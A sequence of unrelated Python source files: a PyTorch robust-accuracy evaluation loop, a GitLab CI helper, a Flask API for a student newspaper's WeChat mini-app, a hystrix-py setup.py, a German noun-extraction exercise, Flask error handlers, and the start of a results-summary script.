    class_total = list(0. for i in range(10))
    model.eval() # prep model for *evaluation*
    for data, target in test_loader:
        data, target = data.to(device), target.to(device)
        # forward pass: compute predicted outputs by passing inputs to the model
        output = model(data)
        # convert output probabilities to predicted class
        _, pred = torch.max(output, 1)
        # compare predictions to true label
        correct = np.squeeze(pred.eq(target.data.view_as(pred)))
        # calculate test accuracy for each object class
        for i in range(len(target)):
            label = target.data[i]
            class_correct[label] += correct[i].item()
            class_total[label] += 1
    test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
    standard_acc_arr.append(test_accuracy)
    print('\n Standard test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
                                                          np.sum(class_correct),
                                                          np.sum(class_total)))
    #--------------------------------------------------------------------------------------
    #--------------------------------------------------------------------------------------
    # Accuracy on the invariance adversarial examples ("robust" accuracy),
    # scored against the human-assigned labels.
    class_correct = list(0. for i in range(10))
    class_total = list(0. for i in range(10))
    model.eval() # prep model for *evaluation*
    for data, target in inv_eg_dataloader:
        data, target = data.to(device), target.to(device)
        # forward pass: compute predicted outputs by passing inputs to the model
        output = model(data)
        # convert output probabilities to predicted class
        _, pred = torch.max(output, 1)
        # compare predictions to true label
        correct = np.squeeze(pred.eq(target.data.view_as(pred)))
        # calculate test accuracy for each object class
        for i in range(len(target)):
            label = target.data[i]
            class_correct[label] += correct[i].item()
            class_total[label] += 1
    test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
    robust_acc_arr.append(test_accuracy)
    print('\n Robust test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
                                                        np.sum(class_correct),
                                                        np.sum(class_total)))
    #--------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------
save_path = "saved_stuff/eval_mlp/"
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(standard_acc_arr, os.path.join(save_path, "standard_acc_arr.pt"))
torch.save(robust_acc_arr, os.path.join(save_path, "robust_acc_arr.pt"))
|
python
|
import os
import requests
from datetime import datetime, timedelta
import gitlab
class Gitlab():
    """Thin helper around GitLab CI environment variables and the API.

    Environment-only helpers work outside CI as well (returning defaults);
    build_number() talks to the GitLab API via python-gitlab.
    """

    def __init__(self, api_url, **kwargs):
        # kwargs are forwarded verbatim (e.g. private_token=...).
        self.gitlab = gitlab.Gitlab(api_url, **kwargs)

    def is_gitlab(self):
        """Return True when running inside a GitLab CI job (CI=true)."""
        return os.environ.get('CI', 'false') == 'true'

    def is_pull_request(self):
        """Return True when the job belongs to a merge request."""
        return self.is_gitlab() and os.environ.get('CI_MERGE_REQUEST_ID', None) is not None

    def branch(self):
        """Current branch name in CI; 'master' outside CI."""
        if self.is_gitlab():
            return os.environ.get('CI_COMMIT_BRANCH')
        else:
            return 'master'

    def commit_hash(self):
        """Full commit SHA, or a run of zeros outside CI."""
        return os.environ.get('CI_COMMIT_SHA', '0' * 30)

    def short_commit_hash(self):
        """First 7 characters of the commit SHA."""
        return os.environ.get('CI_COMMIT_SHA', '0' * 30)[:7]

    def tag(self):
        """Tag name when building a tag, else None."""
        return os.environ.get('CI_COMMIT_TAG', None)

    def is_tag(self):
        """Return True when the job was triggered by a tag."""
        return bool(os.environ.get('CI_COMMIT_TAG', False))

    def home_dir(self):
        return os.environ.get('HOME', '/dev/null')

    def build_dir(self):
        return os.environ.get('CI_BUILDS_DIR', '/dev/null')

    def build_number(self):
        """Increment and return the project's BUILD_NUMBER CI variable.

        Creates the variable (starting at 0) on first use.
        """
        prj = self.gitlab.projects.get(os.environ['CI_PROJECT_ID'])
        try:
            var = prj.variables.get('BUILD_NUMBER')
        except gitlab.exceptions.GitlabGetError as e:
            if e.response_code != 404:
                # BUGFIX: non-404 API errors used to fall through with
                # var = None and crash below; propagate them instead.
                raise
            prj.variables.create({'key': 'BUILD_NUMBER', 'value': '0'})
            # BUGFIX: `var` stayed None after creating the variable, so the
            # very first call raised AttributeError; fetch the new variable.
            var = prj.variables.get('BUILD_NUMBER')
        var.value = str(int(var.value) + 1)
        var.save()
        return int(var.value)
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: __init__.py
# Created Date: 2020-07-28
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
import time
import datetime
import calendar
from functools import wraps
from collections import OrderedDict
from pypinyin import lazy_pinyin
from flask import Blueprint, current_app, g, abort
from ...models import db, WxUser, Article, WxUserArticle, Reporter, ArticleReporter
from ...core.flask.parser import get_str_field, get_int_field, get_bool_field
from ...core.redis.types import RedisAutoExpiredMap
from ...core.utils import u, xMD5
from ...core.exceptions import MiniappUnauthorized, RequestArgumentError
from .api import jscode2session
bpMiniapp = Blueprint('miniapp', __name__)
utoken_map = None
UTOKEN_EXPIRES = 3600 * 12
PAGE_SIZE = 8
QINIU_IMAGE_PREFIX = "https://qiniu.rabbitzxh.top/pkuyouth"
APP_CONFIG = {
"prefix": {
"column": QINIU_IMAGE_PREFIX + "/column_cover/",
"sm_cover": QINIU_IMAGE_PREFIX + "/sm_cover/",
"bg_cover": QINIU_IMAGE_PREFIX + "/bg_cover/"
},
"app_info": {
"name": "北大青年",
"version": "2.0.0",
}
}
INDEX_COL_DESC = [
{
"id": 0,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508266021.jpeg',
"title": '随便看看',
"desc": '随意翻翻北青的文章',
"path": '/pages/collection-random/collection-random',
},
{
"id": 1,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508283011.jpeg',
"title": '热文排行',
"desc": '看看那些阅读量最高的文章',
"path": '/pages/collection-hot/collection-hot',
},
{
"id": 2,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508251861.jpeg',
"title": '还有更多',
"desc": '主编们正在努力整理 ...',
"path": '',
}
]
COLUMNS_LIST = OrderedDict({
"调查": "只做好一件事——刨根问底",
"人物": "今天载了位了不得的人物",
"特稿": "不停留在表面",
"视界": "一览众山小",
"光阴": "不忘初心,继续前进",
"姿势": "干货、湿货、杂货,老司机带你涨姿势",
"言己": "说出你的故事",
"又见": "如果在异乡,一个旅人",
"雕龙": "操千曲而后晓声,观千剑而后识器",
"评论": "条条大路,众生喧哗",
"摄影": "我为了把你拍得更漂亮嘛~",
"图说": "边走边看",
"机动": "说走就走,想停就停;可以跑高速,亦可钻胡同",
"现场": "一车载你直达热点",
"对话": "听见你的声音",
"纪念": "为了未来,收藏过去",
"节日": "今天应该很高兴",
"新年献词": "新时代,新青年",
# "翻译": "null",
})
def init_utoken_map():
    """Lazily create the Redis-backed token -> openid map.

    Must run inside a Flask app context (reads current_app.config).
    """
    global utoken_map
    if utoken_map is not None:
        return
    utoken_map = RedisAutoExpiredMap(
        namespace=current_app.config['CACHE_KEY_PREFIX'] + "miniapp_utk",
        expires=UTOKEN_EXPIRES,
    )
def generate_utoken(openid, session_key):
    """Derive a fresh opaque user token from openid, session_key and now."""
    timestamp_ms = int(time.time() * 1000)
    return xMD5("%s:%s:%s" % (openid, session_key, timestamp_ms))
def get_range(page, size):
    """Return (start, end) slice bounds for a 1-based page number.

    Page numbers below 1 are clamped to the first page.
    """
    if page < 1:
        page = 1
    start = (page - 1) * size
    return (start, start + size)
def verify_utoken(func):
    """Decorator: require a valid 'utoken' request field.

    Resolves the token to an openid via the Redis map, exposes it as
    flask.g.openid, and raises MiniappUnauthorized for unknown/expired
    tokens.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        init_utoken_map()
        utoken = get_str_field('utoken')
        openid = utoken_map[utoken]
        if openid is None:
            raise MiniappUnauthorized("Invalid utoken")
        # u() normalizes the stored value to text (the backend may return bytes)
        g.openid = u(openid)
        ret = func(*args, **kwargs)
        return ret
    return wrapper
@bpMiniapp.route('/', methods=["GET","POST"])
def root():
    # The blueprint root is intentionally not served.
    abort(404)
@bpMiniapp.route('/login', methods=["POST"])
def login():
    """
    Method POST
    JSON:
        - js_code    str
    Return:
        - errcode    int
        - utoken     str
        - setting    dict
            - auto_change_card   bool
            - use_small_card     bool
        - config     dict
    """
    init_utoken_map()
    js_code = get_str_field('js_code')
    # Exchange the wx.login() js_code for the user's openid / session_key.
    openid, session_key = jscode2session(js_code)
    utoken = generate_utoken(openid, session_key)
    utoken_map[utoken] = openid
    # First login creates the WxUser row with default settings.
    user = WxUser.query.get(openid)
    if user is None:
        user = WxUser(openid)
        db.session.add(user)
        db.session.commit()
    return {
        "errcode": 0,
        "utoken": utoken,
        "setting": {
            "auto_change_card": user.auto_change_card,
            "use_small_card": user.use_small_card,
        },
        "config": APP_CONFIG,
    }
@bpMiniapp.route('/get_col_desc', methods=["GET"])
@verify_utoken
def get_col_desc():
    """
    Method GET
    Args:
        - utoken     str
    Return:
        - errcode    int
        - col_desc   [dict]
            - id        int
            - cover     str
            - title     str
            - desc      str
            - path      str
    """
    # Static collection descriptors for the index page.
    return {
        "errcode": 0,
        "col_desc": INDEX_COL_DESC,
    }
@bpMiniapp.route('/get_col_random', methods=["GET"])
@verify_utoken
def get_col_random():
    """
    Method GET
    Args:
        - utoken    str
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    # sbq1: a random sample of PAGE_SIZE visible articles.
    sbq1 = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        order_by(db.func.rand()).\
        limit(PAGE_SIZE).\
        subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/get_latest_articles', methods=["GET"])
@verify_utoken
def get_latest_articles():
    """
    Method GET
    Args:
        - utoken    str
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    # Newest PAGE_SIZE visible articles by masssend_time.
    sbq = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        order_by(Article.masssend_time.desc()).\
        limit(PAGE_SIZE).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.read_num,
            Article.like_num,
            Article.masssend_time,
            Article.cover_url
        ).\
        join(sbq, sbq.c.aid == Article.aid).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/get_col_hot', methods=["GET"])
@verify_utoken
def get_col_hot():
    """
    Method GET
    Args:
        - utoken    str
        - page      int
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    page = get_int_field('page')
    st, ed = get_range(page, PAGE_SIZE)
    # sbq1: one page of visible articles ranked by read count.
    sbq1 = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        order_by(
            Article.read_num.desc(),
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        slice(st, ed).\
        subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        order_by(
            Article.read_num.desc(),
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/get_column_list', methods=["GET"])
@verify_utoken
def get_column_list():
    """
    Method GET
    Args:
        - utoken    str
    Return:
        - errcode   int
        - columns   [dict]
            - id             int
            - title          str
            - desc           str
            - cover          str
            - article_count  int
    """
    columns = list(COLUMNS_LIST.keys())
    # Count visible articles per known column in a single grouped query.
    rlist = db.session.\
        query(
            Article.column,
            db.func.count(Article.aid).label('count'),
        ).\
        filter(Article.hidden == 0).\
        filter(Article.column.in_(columns)).\
        group_by(Article.column).\
        all()
    counter = { r.column: r.count for r in rlist }
    return {
        "errcode": 0,
        "columns": [
            {
                "id": ix,
                "title": title,
                "desc": desc,
                # Cover image filename is the pinyin transliteration of the title.
                "cover": "%s.jpg" % ''.join(lazy_pinyin(title)),
                "article_count": counter.get(title, 0),
            }
            for ix, (title, desc) in enumerate(COLUMNS_LIST.items())
        ],
    }
@bpMiniapp.route('/get_column_articles', methods=["GET"])
@verify_utoken
def get_column_articles():
    """
    Method GET
    Args:
        - utoken    str
        - column    str
        - page      int     if page == 0, return all articles in this column
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    # column must be one of the known COLUMNS_LIST keys.
    column = get_str_field('column', limited=COLUMNS_LIST)
    page = get_int_field('page')
    sbq1 = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        filter(Article.column == column).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        )
    # page == 0 means "no pagination": return the whole column.
    if page != 0:
        st, ed = get_range(page, PAGE_SIZE)
        sbq1 = sbq1.slice(st, ed)
    sbq1 = sbq1.subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/get_date_range', methods=["GET"])
@verify_utoken
def get_date_range():
    """
    Method GET
    Args:
        - utoken    str
    Return:
        - errcode   int
        - range     dict with "start"/"end" dates formatted as YYYY-MM-DD
    """
    # Min/max publish timestamps over all articles (hidden ones included).
    rlist = db.session.\
        query(
            db.func.min(Article.masssend_time),
            db.func.max(Article.masssend_time)
        ).\
        first()
    st, ed = map(lambda t: time.strftime("%Y-%m-%d", time.localtime(t)), rlist)
    return {
        "errcode": 0,
        "range": {
            "start": st,
            "end": ed,
        }
    }
@bpMiniapp.route('/search_reporters', methods=["GET"])
@verify_utoken
def search_reporters():
    """
    Method GET
    Args:
        - utoken      str
        - keyword     str
    Return:
        - errcode     int
        - reporters   [dict]
            - name        str
            - articles    [int]
    """
    keyword = get_str_field("keyword")
    # Whitespace-separated keyword is treated as a list of exact reporter names.
    names = [ name.strip() for name in keyword.split() if len(name.strip()) > 0 ]
    # Only count visible articles.
    sbq = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        subquery()
    reporters = db.session.\
        query(
            Reporter.name,
            db.func.count(sbq.c.aid).label('article_count'),
        ).\
        join(ArticleReporter, ArticleReporter.rid == Reporter.rid).\
        join(sbq, sbq.c.aid == ArticleReporter.aid).\
        filter(Reporter.name.in_(names)).\
        group_by(Reporter.rid).\
        order_by(db.desc('article_count')).\
        all()
    return {
        "errcode": 0,
        "reporters": [ r._asdict() for r in reporters ],
    }
@bpMiniapp.route('/get_reporter_articles', methods=["GET"])
@verify_utoken
def get_reporter_articles():
    """
    Method GET
    Args:
        - utoken    str
        - name      str
        - page      int     if page == 0, return all articles of this reporter
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    name = get_str_field('name')
    page = get_int_field('page')
    # sbq1: visible articles credited to the reporter with this exact name.
    sbq1 = db.session.\
        query(Article.aid).\
        join(ArticleReporter, ArticleReporter.aid == Article.aid).\
        join(Reporter, Reporter.rid == ArticleReporter.rid).\
        filter(Reporter.name == name).\
        filter(Article.hidden == 0).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        )
    # page == 0 means "no pagination".
    if page != 0:
        st, ed = get_range(page, PAGE_SIZE)
        sbq1 = sbq1.slice(st, ed)
    sbq1 = sbq1.subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ],
    }
@bpMiniapp.route('/search_articles_by_date', methods=["GET"])
@verify_utoken
def search_articles_by_date():
    """
    Method GET
    Args:
        - utoken    str
        - date      str
        - level     str     options: ('month','day')
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    date = get_str_field('date')
    level = get_str_field('level', limited=['month','day'])
    try:
        dt = datetime.datetime.strptime(date, '%Y-%m-%d')
    except ValueError as e:
        raise RequestArgumentError("Invalid date %s" % date)
    # Expand the query window to the whole month or the single day.
    if level == 'month':
        st = datetime.datetime(dt.year, dt.month, 1)
        span = calendar.monthrange(dt.year, dt.month)[1]
    else:
        st = dt
        span = 1
    ed = st + datetime.timedelta(span)
    st, ed = map(lambda dt: int(dt.timestamp()), [st, ed])
    # NOTE(review): BETWEEN is inclusive on both ends, so an article stamped
    # exactly at `ed` (start of the next period) is included -- confirm intended.
    sbq1 = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        filter(Article.masssend_time.between(st, ed)).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        order_by(
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ],
    }
@bpMiniapp.route('/search_articles_by_keyword', methods=["GET"])
@verify_utoken
def search_articles_by_keyword():
    """
    Method GET
    Args:
        - utoken    str
        - keyword   str
        - filter    str     options: ('all','favorite')/column/reporter
        - page      int
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    keyword = get_str_field('keyword')
    ft = get_str_field('filter')
    page = get_int_field('page')
    st, ed = get_range(page, PAGE_SIZE)
    # Full-text match score per article (db.fts_match is a project helper;
    # BOOLEAN presumably selects MySQL boolean-mode matching -- see its docs).
    sbq1 = db.session.\
        query(
            Article.aid,
            db.fts_match(
                Article.ix_text,
                keyword,
                db.fts_match.BOOLEAN
            ).label('score')
        )
    # The filter is, in priority order: the literal 'all'/'favorite',
    # a known column name, or otherwise a reporter name.
    if ft == 'all':
        pass
    elif ft == 'favorite':
        sbq1 = sbq1.\
            join(WxUserArticle).\
            filter(WxUserArticle.openid == openid)
    elif ft in COLUMNS_LIST:
        sbq1 = sbq1.\
            filter(Article.column == ft)
    else:
        sbq1 = sbq1.\
            join(ArticleReporter, ArticleReporter.aid == Article.aid).\
            join(Reporter, Reporter.rid == ArticleReporter.rid).\
            filter(Reporter.name == ft)
    sbq1 = sbq1.\
        filter(Article.hidden == 0).\
        order_by(
            db.desc('score'),
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        slice(st, ed).\
        subquery()
    # sbq2: the current user's starred articles (supplies star_time).
    sbq2 = WxUserArticle.query.\
        filter(WxUserArticle.openid == openid).\
        subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq2.c.ctime.label('star_time'),
        ).\
        join(sbq1, sbq1.c.aid == Article.aid).\
        outerjoin(sbq2, sbq2.c.aid == Article.aid).\
        order_by(
            sbq1.c.score.desc(),
            Article.masssend_time.desc(),
            Article.idx.asc(),
        ).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/get_starred_articles', methods=["GET"])
@verify_utoken
def get_starred_articles():
    """
    Method GET
    Args:
        - utoken    str
        - page      int     if page == 0, return all starred articles
    Return:
        - errcode   int
        - articles  [dict]
    """
    openid = g.openid
    page = get_int_field('page')
    # Visible articles starred by the user, newest star first.
    sbq = db.session.\
        query(
            Article.aid,
            WxUserArticle.ctime,
        ).\
        join(WxUserArticle).\
        filter(WxUserArticle.openid == openid).\
        filter(Article.hidden == 0).\
        order_by(WxUserArticle.ctime.desc())
    # page == 0 means "no pagination".
    if page != 0:
        st, ed = get_range(page, PAGE_SIZE)
        sbq = sbq.slice(st, ed)
    sbq = sbq.subquery()
    articles = db.session.\
        query(
            Article.aid,
            Article.appmsgid,
            Article.idx,
            Article.sn,
            Article.title,
            Article.masssend_time,
            Article.cover_url,
            Article.read_num,
            Article.like_num,
            Article.hidden,
            sbq.c.ctime.label('star_time'),
        ).\
        join(sbq, sbq.c.aid == Article.aid).\
        order_by(db.desc('star_time')).\
        all()
    return {
        "errcode": 0,
        "articles": [ a._asdict() for a in articles ]
    }
@bpMiniapp.route('/star_article', methods=["POST"])
@verify_utoken
def star_article():
    """
    Method POST
    JSON:
        - utoken    str
        - aid       int
        - action    str     options: ('star','unstar')
    Return:
        - errcode   int
    """
    openid = g.openid
    aid = get_int_field('aid')
    action = get_str_field('action', limited=['star','unstar'])
    # Reject unknown or hidden articles.
    ret = db.session.\
        query(Article.aid).\
        filter(Article.hidden == 0).\
        filter(Article.aid == aid).\
        first()
    if ret is None:
        raise RequestArgumentError("Article %d was not found" % aid)
    ua = WxUserArticle.query.\
        filter(WxUserArticle.aid == aid).\
        filter(WxUserArticle.openid == openid).\
        first()
    # Both operations are idempotent: starring twice / unstarring a
    # non-starred article is a no-op.
    if action == 'star' and ua is None:
        ua = WxUserArticle(openid, aid)
        db.session.add(ua)
        db.session.commit()
    if action == 'unstar' and ua is not None:
        db.session.delete(ua)
        db.session.commit()
    return {
        "errcode": 0
    }
@bpMiniapp.route('/change_setting', methods=["POST"])
@verify_utoken
def change_setting():
    """
    Method POST
    JSON:
        - utoken    str
        - key       str     one of: 'auto_change_card', 'use_small_card'
        - value     bool
    Return:
        - errcode   int
    """
    openid = g.openid
    key = get_str_field('key')
    value = get_bool_field('value')
    user = WxUser.query.get(openid)
    if key == 'auto_change_card':
        user.auto_change_card = value
    elif key == 'use_small_card':
        user.use_small_card = value
    else:
        raise RequestArgumentError("Invalid setting key %s" % key)
    db.session.commit()
    return {
        "errcode": 0
    }
|
python
|
import os
import re
import sys
import codecs
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))

setup_requires = ['pytest', 'tox']
install_requires = ['six', 'tox', 'atomos']
tests_require = ['six', 'pytest-cov', 'pytest-cache', 'pytest-timeout']
dev_requires = ['pyflakes', 'pep8', 'pylint', 'check-manifest',
                'ipython', 'ipdb', 'sphinx', 'sphinx_rtd_theme',
                'sphinxcontrib-napoleon']
# BUGFIX: extend, not append -- append() nested the whole tests_require
# list as a single (invalid) entry inside dev_requires.
dev_requires.extend(tests_require)

# BUGFIX: compare with ==, not `is` -- integer identity is an
# implementation detail and warns on modern CPython.
PY2 = sys.version_info.major == 2
PY3 = sys.version_info.major == 3

if PY2:
    install_requires.append('futures')
    install_requires.append('enum34')
# NOTE(review): enum34 is a Python 2 backport that shadows the stdlib
# enum module on Python 3, so it is intentionally no longer added for PY3.

# Extract the newest version number from the first "#... x.y[.z]" heading
# in CHANGES.md; fall back to 0.0.0 when none is found.
version = "0.0.0"
changes = os.path.join(here, "CHANGES.md")
# BUGFIX: keep the pattern in its own (raw-string, pre-compiled) variable.
# The old code rebound `match` to the result of re.match(), so the second
# loop iteration passed None / a Match object back in as the pattern.
version_pattern = re.compile(r'^#*\s*(?P<version>[0-9]+\.[0-9]+(\.[0-9]+)?)$')
with codecs.open(changes, encoding='utf-8') as changes_file:
    for line in changes_file:
        match = version_pattern.match(line)
        if match:
            version = match.group("version")
            break

# Get the long description
with codecs.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
# Full changelog text (kept for completeness; not passed to setup()).
with codecs.open(os.path.join(here, 'CHANGES.md'), encoding='utf-8') as f:
    changelog = f.read()
class VersionCommand(Command):
    """`python setup.py version` -- print the detected library version."""
    description = "print library version"
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        # `version` is parsed from CHANGES.md at module import time.
        print(version)
class PyTest(TestCommand):
    """`python setup.py test` -- run the pytest suite with coverage."""

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = ['--strict', '--verbose', '--tb=long',
                          '--cov', 'hystrix', '--cov-report',
                          'term-missing', 'tests']
        self.test_suite = True

    def run_tests(self):
        # imported lazily so pytest is only required when tests actually run
        import pytest
        errno = pytest.main(self.test_args)
        sys.exit(errno)
class Tox(TestCommand):
    """`python setup.py tox` -- run the tox matrix (args via -a/--tox-args)."""
    user_options = [('tox-args=', 'a', "Arguments to pass to tox")]

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.tox_args = None

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        # import here, cause outside the eggs aren't loaded
        import tox
        import shlex
        args = self.tox_args
        if args:
            # Split the shell-style argument string into a list for tox.
            args = shlex.split(self.tox_args)
        errno = tox.cmdline(args=args)
        sys.exit(errno)
setup(
    name='hystrix-py',
    # BUGFIX: use the version parsed from CHANGES.md instead of a stale
    # hard-coded string (the computed `version` above was never used).
    version=version,
    description='A Netflix Hystrix implementation in Python',
    long_description=long_description,
    url='https://github.com/wiliamsouza/hystrix-py',
    author='The Hystrix Python Authors',
    author_email='[email protected]',
    license='Apache Software License 2.0',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        # BUGFIX: use valid trove classifiers -- PyPI rejects uploads with
        # unknown classifiers ("...:: Library" and the "2.0"-suffixed
        # license string are not in the official list).
        'Topic :: Software Development :: Libraries',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
    ],
    keywords='sample setuptools development',
    packages=find_packages(exclude=['docs', 'tests']),
    setup_requires=setup_requires,
    install_requires=install_requires,
    tests_require=tests_require,
    extras_require={
        'dev': dev_requires,
        'test': tests_require,
    },
    cmdclass={
        "version": VersionCommand,
        'test': PyTest,
        "tox": Tox,
    },
)
|
python
|
# Unsere Funktion nimmt eine Liste als Parameter
# Unsere Funktion nimmt eine Liste als Parameter
def find_nouns(list_of_words, sentence_endings=(".", "!", "?")):
    """Return words that are capitalized but do not start a sentence.

    A word is kept when it starts with an uppercase letter and the previous
    word does not end a sentence.  The first word is always skipped, since
    it is capitalized regardless of being a noun.

    Args:
        list_of_words: tokenized text, e.g. from str.split().
        sentence_endings: punctuation treated as sentence boundaries.
            Generalized (backward-compatible) parameter: the original only
            recognized "." and therefore misclassified the first word after
            "!" or "?" as a noun.
    """
    nouns = []
    endings = tuple(sentence_endings)
    for i in range(1, len(list_of_words)):
        current_word = list_of_words[i]
        previous_word = list_of_words[i - 1]
        # Keep capitalized words unless they merely start a new sentence.
        if current_word[0].isupper() and not previous_word.endswith(endings):
            nouns.append(current_word)
    return nouns
with open("hase_igel.txt") as f:
    story = f.read()
# Naive whitespace tokenization; punctuation stays attached to the words.
words = story.split()
nouns = find_nouns(words)
# Write the candidates as a single comma-separated line.
with open("hase_igel_nouns.txt", "w") as result:
    for noun in nouns:
        result.write(noun + ", ")
|
python
|
from app import app
from flask import Blueprint, render_template
@app.errorhandler(404)
def not_found_error(error):
    """Render the custom 404 page.

    BUGFIX: Flask invokes error handlers with the raised error as an
    argument; the previous zero-argument signature raised a TypeError on
    every 404 instead of rendering the page.
    """
    return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_error(error):
    # Render the custom 500 page; `error` is the original exception.
    return render_template('errors/500.html'), 500
|
python
|
import glob
import numpy as np
import sys
import argparse
def main():
    """Aggregate per-run result files and print mean ± std summaries.

    Each matched file must contain one line: "<loss> <train_acc> <test_acc>".
    """
    parser = argparse.ArgumentParser(description="Produce report from result files")
    parser.add_argument('--path', type=str, default="",
                        help="Path to the result files (* will be appended)")
    args = parser.parse_args()
    test_accuracies = []
    train_accuracies = []
    train_losses = []
    for f in glob.glob(args.path + "*"):
        with open(f) as ff:
            loss, train_acc, test_acc = map(float, ff.readline().split())
        test_accuracies.append(test_acc)
        train_accuracies.append(train_acc)
        train_losses.append(loss)
